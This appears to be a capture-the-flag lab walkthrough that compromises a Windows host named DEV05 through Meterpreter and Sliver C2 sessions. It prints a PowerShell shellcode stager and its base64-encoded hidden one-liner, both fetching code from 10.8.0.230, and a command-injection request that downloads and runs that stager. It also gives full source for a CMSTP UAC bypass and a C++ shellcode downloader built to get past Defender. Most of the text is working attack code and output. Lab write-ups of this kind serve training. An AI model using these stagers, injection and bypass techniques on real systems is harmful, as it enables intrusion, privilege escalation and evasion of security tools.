msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows  EU-IFRIT\Jack.Smith @ DEV05  10.8.0.230:443 -> 172.16.41.40:63720 (172.16.41.40)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps | grep explorer
Filtering on 'explorer'

Process List
============

 PID    PPID   Name          Arch  Session  User                 Path
 ---    ----   ----          ----  -------  ----                 ----
 10656  10636  explorer.exe  x64   1        EU-IFRIT\Jack.Smith  C:\Windows\explorer.exe

meterpreter > migrate 10656
[*] Migrating from 17568 to 10656...
[*] Migration completed successfully.

After a quick check we can see that Jack is under local admin group (Group used for deny only) and with Medium Mandatory Level so needed to bypass UAC then grab the 1st flag.

For more capacity we will switch to Sliver C2.

C2 preparing (with Sliver)

Following the same process than with Wutai, we create our implant then upload in the Powershell session of Jack (from the previous POC method) but we are catched…

image

Step back and go with another approach.

Create our implant profile:

$ sliver-server
[*] Loaded 21 aliases from disk
[*] Loaded 142 extension(s) from disk

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—     β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
    β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
    β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•β•  β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•

All hackers gain indestructible
[*] Server v1.5.42 - kali
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > profiles new --http 10.8.0.230 --skip-symbols --format shellcode --arch amd64 ifrit-http

[*] Saved new implant profile ifrit-http

From this usage we don’t need to start the listener ([server] sliver > http) because we will use a stage listener.

Start the stage listener:

[server] sliver > stage-listener --url http://10.8.0.230:80 --profile ifrit-http

[*] No builds found for profile ifrit-http, generating a new one
[*] Sliver name for profile ifrit-http: OFFICIAL_OSMOSIS
[*] Job 1 (http) started

Check that all works as expected:

[server] sliver > jobs 

 ID   Name   Protocol   Port   Stage Profile                              
==== ====== ========== ====== ============================================
 1    http   tcp        80     ifrit-http (Sliver name: OFFICIAL_OSMOSIS) 

Now we need to create our stager.

Following dominicbreuker - Sliver C2 stagers, we create a PowerShell Stager.

PowerShell itself doesn’t allow direct access to memory, so we have to call functions from low-level libraries but it’s not really supported.

While there is no equivalent of P/Invoke in PowerShell, there is good interoperability between PowerShell and C#.

Using the Add-Type cmdlet, we can add a .NET class to a PowerShell session. This way we can use P/Invoke in PowerShell too.

Below our PoSH code snippet stager.ps1, well commented that adds a class called Win32 to PowerShell which exposes VirtualAlloc, CreateThread and WaitForSingleObject:

# An in-memory assembly
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress,
    uint dwSize,
    uint flAllocationType,
    uint flProtect);
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(
    IntPtr hHandle,
    UInt32 dwMilliseconds);
}
"@
Add-Type $Win32

# Download shellcode, ensure some data was retrieved and store it’s size into a variable
$shellcode = (New-Object System.Net.WebCLient).DownloadData("http://10.8.0.230/fontawesome.woff")
if ($shellcode -eq $null) {Exit};
$size = $shellcode.Length

# Run the shellcode
[IntPtr]$addr = [Win32]::VirtualAlloc(0,$size,0x1000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $size)
$thandle=[Win32]::CreateThread(0,0,$addr,0,0,0);
[Win32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

Now the final touch is to create an one-liner from this code:

  • Convert to Base64:
$ cat stager.ps1 | iconv --to-code UTF-16LE | base64 -w 0
JABXAGkAbgAzADIAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAKACAAIAAgACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAKACAAIAAgACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgACgAgACAAIAAgAEkAbgB0AFAAdAByACAAaABIAGEAbgBkAGwAZQAsAAoAIAAgACAAIABVAEkAbgB0ADMAMgAgAGQAdwBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwApADsACgB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABXAGkAbgAzADIACgAKACQAcwBoAGUAbABsAGMAbwBkAGUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMATABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACIAaAB0AHQAcAA6AC8ALwAxADAALgA4AC4AMAAuADIAMwAwAC8AZgBvAG4AdABhAHcAZQBzAG8AbQBlAC4AdwBvAGYAZgAiACkACgBpAGYAIAAoACQAcwBoAGUAbABsAGMAbwBkAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApACAAewBFAHgAaQB0AH0AOwAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgACgAKAFsASQBuAHQAUAB0AHIAXQAkAGEAZABkAHIAIAA9ACAAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAJABzAGkAegBlACwAMAB4ADEAMAAwADAALAAwAHgANAAwACkAOwAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAAoAJAB0AGgAYQBuAGQAbABlAD0AWwBXAGkAbgAzADIAXQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAYQBkAGQAcgAsADAALAAwACwAMAApADsACgBbAFcAaQBuADMAMgBdADoAOgBXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgAJAB0AGgAYQBuAGQAbABlACwAIABbAHUAaQBuAHQAMwAyAF0AIgAwAHgARgBGAEYARgBGAEYARgBGACIAKQAKAA==

Iconv converts the code to UTF16 little-endian which is the encoding used in Windows (not in Linux but our target is a Windows machine).

  • Create a new stage4.ps1 where this Base64-encoded code can now be passed as an argument to PowerShell:
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAKACAAIAAgACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAKACAAIAAgACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgACgAgACAAIAAgAEkAbgB0AFAAdAByACAAaABIAGEAbgBkAGwAZQAsAAoAIAAgACAAIABVAEkAbgB0ADMAMgAgAGQAdwBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwApADsACgB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABXAGkAbgAzADIACgAKACQAcwBoAGUAbABsAGMAbwBkAGUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMATABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACIAaAB0AHQAcAA6AC8ALwAxADAALgA4AC4AMAAuADIAMwAwAC8AZgBvAG4AdABhAHcAZQBzAG8AbQBlAC4AdwBvAGYAZgAiACkACgBpAGYAIAAoACQAcwBoAGUAbABsAGMAbwBkAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApACAAewBFAHgAaQB0AH0AOwAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgACgAKAFsASQBuAHQAUAB0AHIAXQAkAGEAZABkAHIAIAA9ACAAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAJABzAGkAegBlACwAMAB4ADEAMAAwADAALAAwAHgANAAwACkAOwAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAAoAJAB0AGgAYQBuAGQAbABlAD0AWwBXAGkAbgAzADIAXQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAYQBkAGQAcgAsADAALAAwACwAMAApADsACgBbAFcAaQBuADMAMgBdADoAOgBXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgAJAB0AGgAYQBuAGQAbABlACwAIABbAHUAaQBuAHQAMwAyAF0AIgAwAHgARgBGAEYARgBGAEYARgBGACIAKQAKAA==
  • The argument -nop avoids that a custom PowerShell profile get loaded, which may break our code.
  • With -w hidden we ensure that the console windows is not visible (or disappears if you paste the code into one).
  • Our Base64-encoded code is passed with -Enc.

Set a local web server (listening on 443/tcp because our sliver stage listener is on 80/tcp):

$ python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...

And let’s go for Rock & Roll to the API:

$ curl -x "http://172.16.40.150:3128/" \
-X POST "http://172.16.41.40:13300/api/query" \
-H "Content-Type: application/json" \
-u dev:dev-5381 --data \
'{"query":"blabla & powershell iex(iwr -usebasicparsing 10.8.0.230:443/stage4.ps1)"}'  

Then get a callback and obtain our session as Jack on DEV05:

[*] Session 79ee12b5 OFFICIAL_OSMOSIS - 172.16.41.40:61862 (DEV05) - windows/amd64 - Tue, 27 Aug 2024 18:11:02 JST

[server] sliver > sessions 

 ID         Name               Transport   Remote Address       Hostname   Username              Operating System   Locale   Last Message                            Health  
========== ================== =========== ==================== ========== ===================== ================== ======== ======================================= =========
 79ee12b5   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:61862   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Tue Aug 27 18:11:09 JST 2024 (1s ago)   [ALIVE] 

We migrate to the explorer.exe process (or svchost) to keep a persistent connection:

[server] sliver > use 79ee12b5-acc0-4d5a-8272-fc81526e434e

[*] Active session OFFICIAL_OSMOSIS (79ee12b5-acc0-4d5a-8272-fc81526e434e)

[server] sliver (OFFICIAL_OSMOSIS) > ps --exe explorer

 Pid    Ppid   Owner                 Arch     Executable     Session 
====== ====== ===================== ======== ============== =========
 5772   5148   EU-IFRIT\jack.smith   x86_64   explorer.exe   1       


⚠️  Security Product(s): Sysmon64

[server] sliver (OFFICIAL_OSMOSIS) > migrate -p 5772

[*] Successfully migrated to 5772

[*] Session 580c36d6 OFFICIAL_OSMOSIS - 172.16.41.40:62032 (DEV05) - windows/amd64 - Tue, 27 Aug 2024 18:12:29 JST

[server] sliver (OFFICIAL_OSMOSIS) > use 580c36d6-705a-4737-901f-047eaedd8ec9

[*] Active session OFFICIAL_OSMOSIS (580c36d6-705a-4737-901f-047eaedd8ec9)

[server] sliver (OFFICIAL_OSMOSIS) > sessions 

 ID         Name               Transport   Remote Address       Hostname   Username              Operating System   Locale   Last Message                            Health  
========== ================== =========== ==================== ========== ===================== ================== ======== ======================================= =========
 79ee12b5   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:61862   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Tue Aug 27 18:12:38 JST 2024 (2s ago)   [ALIVE] 
 580c36d6   OFFICIAL_OSMOSIS   http(s)     172.16.41.40:62032   DEV05      EU-IFRIT\jack.smith   windows/amd64      en-US    Tue Aug 27 18:12:39 JST 2024 (1s ago)   [ALIVE] 

UAC Bypassing (Ifrit_Engineering)

Quick check to get some info about Jack:

[server] sliver (OFFICIAL_OSMOSIS) > getuid

S-1-5-21-815464091-3988217837-1862656938-1320

[server] sliver (OFFICIAL_OSMOSIS) > getprivs 

Privilege Information for explorer.exe (PID: 5772)
--------------------------------------------------

Process Integrity Level: Medium

Name                          	Description                          	Attributes
====                          	===========                          	==========
SeShutdownPrivilege           	Shut down the system                 	Disabled
SeChangeNotifyPrivilege       	Bypass traverse checking             	Enabled, Enabled by Default
SeUndockPrivilege             	Remove computer from docking station 	Disabled
SeIncreaseWorkingSetPrivilege 	Increase a process working set       	Disabled
SeTimeZonePrivilege           	Change the time zone                 	Disabled

Process Integrity Level: Medium but we need to have a High level to become full admin

[server] sliver (OFFICIAL_OSMOSIS) > sa-netlocalgroup2 dev05

[*] Successfully executed sa-netlocalgroup2 (coff-loader)
[*] Got output:
[*] Querying Remote Desktop Users...
[*] Querying Distributed COM Users...
[*] Querying Remote Management Users...
[*] Querying Administrators...
----------Local Group Member----------
Host: dev05
Group: Administrators
Member: DEV05\Administrator
MemberSid: S-1-5-21-1116710314-1528939839-590681564-500
MemberSidType: User
--------End Local Group Member--------

----------Local Group Member----------
Host: dev05
Group: Administrators
Member: DEV05\admin
MemberSid: S-1-5-21-1116710314-1528939839-590681564-1001
MemberSidType: User
--------End Local Group Member--------

----------Local Group Member----------
Host: dev05
Group: Administrators
Member: EU-IFRIT\Domain Admins
MemberSid: S-1-5-21-815464091-3988217837-1862656938-512
MemberSidType: Group
--------End Local Group Member--------

----------Local Group Member----------
Host: dev05
Group: Administrators
Member: EU-IFRIT\jack.smith
MemberSid: S-1-5-21-815464091-3988217837-1862656938-1320
MemberSidType: User
--------End Local Group Member--------

Interesting, our Jack is under local admin group

So let’s grab the 1st flag:

[server] sliver (OFFICIAL_OSMOSIS) > ls \\Users\\Admin

C:\Users\Admin (0 items, 0 B)
=============================

Outch … failed

Despite being in a shell owned by Jack.Smith, who is in the Administrators group, I can’t access the admin home folder.

We have enough information to know that we need to bypass UAC (User Access Control) to obtain full privileges.

Want to be sure at 100% ???

[server] sliver (OFFICIAL_OSMOSIS) > execute -o reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System 

[*] Output:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    DSCAutomationHostEnabled    REG_DWORD    0x2
    EnableCursorSuppression    REG_DWORD    0x1
    EnableFullTrustStartupTasks    REG_DWORD    0x2
    EnableInstallerDetection    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1
    EnableSecureUIAPaths    REG_DWORD    0x1
    EnableUIADesktopToggle    REG_DWORD    0x0
    EnableUwpStartupTasks    REG_DWORD    0x2
    EnableVirtualization    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    SupportFullTrustStartupTasks    REG_DWORD    0x1
    SupportUwpStartupTasks    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
    legalnoticecaption    REG_SZ    
    legalnoticetext    REG_SZ    
    scforceoption    REG_DWORD    0x0
    shutdownwithoutlogon    REG_DWORD    0x1
    undockwithoutlogon    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UIPI
  • EnableLUA is set to 1
  • PromptSecureDesktop is also set to 1
  • Then confirmed that UAC is enabled

Quick check on vl-detections == always stealth and safe

Of course we can following How to Bypass UAC in newer Windows versions.

Using the Source.cs file:

/* 
UAC Bypass using CMSTP.exe microsoft binary

Based on previous work from Oddvar Moe
https://oddvar.moe/2017/08/15/research-on-cmstp-exe/

And this PowerShell script of Tyler Applebaum
https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1

Code author: Andre Marques (@_zc00l)
*/
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Windows;
using System.Runtime.InteropServices;

public class CMSTPBypass
{
    // Our .INF file data!
    public static string InfData = @"[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"

[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""

";

    [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);

    public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";

    /* Generates a random named .inf file with command to be executed with UAC privileges */
    public static string SetInfFile(string CommandToExecute)
    {
        string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
        string TemporaryDir = "C:\\windows\\temp";
        StringBuilder OutputFile = new StringBuilder();
        OutputFile.Append(TemporaryDir);
        OutputFile.Append("\\");
        OutputFile.Append(RandomFileName);
        OutputFile.Append(".inf");
        StringBuilder newInfData = new StringBuilder(InfData);
        newInfData.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
        File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
        return OutputFile.ToString();
    }

    public static bool Execute(string CommandToExecute)
    {
        if(!File.Exists(BinaryPath))
        {
            Console.WriteLine("Could not find cmstp.exe binary!");
            return false;
        }
        StringBuilder InfFile = new StringBuilder();
        InfFile.Append(SetInfFile(CommandToExecute));

        Console.WriteLine("Payload file written to " + InfFile.ToString());
        ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
        startInfo.Arguments = "/au " + InfFile.ToString();
        startInfo.UseShellExecute = false;
        Process.Start(startInfo);

        IntPtr windowHandle = new IntPtr();
        windowHandle = IntPtr.Zero;
        do {
            windowHandle = SetWindowActive("cmstp");
        } while (windowHandle == IntPtr.Zero);

        System.Windows.Forms.SendKeys.SendWait("{ENTER}");
        return true;
    }

    public static IntPtr SetWindowActive(string ProcessName)
    {
        Process[] target = Process.GetProcessesByName(ProcessName);
        if(target.Length == 0) return IntPtr.Zero;
        target[0].Refresh();
        IntPtr WindowHandle = new IntPtr();
        WindowHandle = target[0].MainWindowHandle;
        if(WindowHandle == IntPtr.Zero) return IntPtr.Zero;
        SetForegroundWindow(WindowHandle);
        ShowWindow(WindowHandle, 5);
        return WindowHandle;
    }
}

with the procedure:

  • To compile it in a PowerShell shell in the same directory as this source.
  • UAC Bypass directly from DLL
  • Call an exec file (or ps1 file) to obtain an high-integrity process
[server] sliver (OFFICIAL_OSMOSIS) > cd \\programdata\\1
[server] sliver (OFFICIAL_OSMOSIS) > upload Source.cs
[server] sliver (OFFICIAL_OSMOSIS) > upload stage4.ps1
[server] sliver (OFFICIAL_OSMOSIS) > shell
Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
[CMSTPBypass]::Execute("C:\programdata\1\stage4.ps1")

But not the good way as we are catched:

image

Then we create our own stager in C++ named stager.cpp to be able to have a binary instead of a PoSH:

#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment (lib, "Wininet.lib")

// Structure for our Shellcode
struct Shellcode {
	byte* data;
	DWORD len;
};
// Define our target where we download our payload
Shellcode Download(LPCWSTR host, INTERNET_PORT port);
void Execute(Shellcode shellcode);

int main() {
	::ShowWindow(::GetConsoleWindow(), SW_HIDE); // hide console window

	Shellcode shellcode = Download(L"10.8.0.230", 80);
	Execute(shellcode);

	return 0;
}
// Download our payload
Shellcode Download(LPCWSTR host, INTERNET_PORT port) {
	HINTERNET session = InternetOpen(
		L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
		INTERNET_OPEN_TYPE_PRECONFIG,
		NULL,
		NULL,
		0);

	HINTERNET connection = InternetConnect(
		session,
		host,
		port,
		L"",
		L"",
		INTERNET_SERVICE_HTTP,
		0,
		0);

	HINTERNET request = HttpOpenRequest(
		connection,
		L"GET",
		L"/fontawesome.woff",
		NULL,
		NULL,
		NULL,
		0,
		0);

	WORD counter = 0;
	while (!HttpSendRequest(request, NULL, 0, 0, 0)) {
		//printf("Error sending HTTP request: : (%lu)\n", GetLastError()); // only for debugging

		counter++;
		Sleep(3000);
		if (counter >= 3) {
			exit(0); // HTTP requests eventually failed
		}
	}

	DWORD bufSize = BUFSIZ;
	byte* buffer = new byte[bufSize];

	DWORD capacity = bufSize;
	byte* payload = (byte*)malloc(capacity);

	DWORD payloadSize = 0;

	while (true) {
		DWORD bytesRead;

		if (!InternetReadFile(request, buffer, bufSize, &bytesRead)) {
			//printf("Error reading internet file : <%lu>\n", GetLastError()); // only for debugging
			exit(0);
		}

		if (bytesRead == 0) break;

		if (payloadSize + bytesRead > capacity) {
			capacity *= 2;
			byte* newPayload = (byte*)realloc(payload, capacity);
			payload = newPayload;
		}

		for (DWORD i = 0; i < bytesRead; i++) {
			payload[payloadSize++] = buffer[i];
		}
		
	}
	byte* newPayload = (byte*)realloc(payload, payloadSize);

	InternetCloseHandle(request);
	InternetCloseHandle(connection);
	InternetCloseHandle(session);

	struct Shellcode out;
	out.data = payload;
	out.len = payloadSize;
	return out;
}
// Execute our payload
void Execute(Shellcode shellcode) {
	void* exec = VirtualAlloc(0, shellcode.len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, shellcode.data, shellcode.len);
	((void(*)())exec)();
}

We compile it then check with Defender locally and no threat found.

Now we will use the repository UAC-BOF-Bonanza to download and compile a UAC bypass extension for Sliver C2.

We focus on RegistryShellCommand that modifies the “ms-settings\Shell\Open\command” registry key and executes an auto-elevated EXE (ComputerDefaults.exe).

$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
$ cp -rp ~/VULNLAB/Ifrit/UAC-BOF-Bonanza/RegistryShellCommand ~/.sliver-client/extensions/
